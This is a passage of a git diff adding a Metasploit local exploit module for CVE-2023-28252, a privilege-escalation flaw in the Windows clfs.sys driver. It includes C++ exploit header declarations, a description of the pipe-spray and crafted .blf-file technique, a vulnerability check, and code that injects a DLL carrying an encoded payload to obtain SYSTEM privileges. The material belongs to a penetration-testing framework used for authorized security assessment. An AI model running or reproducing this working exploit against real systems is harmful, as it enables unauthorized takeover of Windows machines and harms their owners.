ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PVOID EaBuffer,
ULONG EaLength
);
typedef NTSTATUS(__stdcall* fNtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine, // PIO_APC_ROUTINE is just a pointer to a function
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
typedef NTSTATUS(__stdcall* fNtCreateIoCompletion)(
PHANDLE IoCompletionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG NumberOfConcurrentThreads
);
typedef NTSTATUS(__stdcall* fNtSetIoCompletion)(
HANDLE IoCompletionHandle,
ULONG CompletionKey,
PIO_STATUS_BLOCK IoStatusBlock,
NTSTATUS CompletionStatus,
ULONG NumberOfBytesTransferred
);
class exploit {
public:
DWORD Exploit(PVOID pPayload);
};

6455
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntos.h vendored Executable file
View File

File diff suppressed because it is too large Load Diff

BIN
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntoskrnl.lib vendored Executable file
View File

Binary file not shown.

126
modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb Normal file
View File

@ -0,0 +1,126 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::Windows::Version
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',
'Description' => %q{
A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.
The clfs.sys driver contains a function CreateLogFile that is used to create
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.
This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.
The exploits creates a controlled memory space by first looping over the CreatePipe function to
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.
This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).
},
'License' => MSF_LICENSE,
'Author' => [
'Ricardo Narvaja', # Original PoC (@ricnar456)
'Esteban.kazimirow', # Original PoC (@solidclt)
'jheysel-r7' # msf module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'References' => [
[ 'CVE', '2023-28252' ],
[ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]
],
'DisclosureDate' => '2023-04-11',
'DefaultTarget' => 0,
'Privileged' => true,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed
'SideEffects' => []
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
]
}
}
}
)
)
end
def check
unless session.platform == 'windows'
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'
unless file?(file_path)
return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')
end
version = get_version_info
if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022
return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")
end
CheckCode::Safe
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end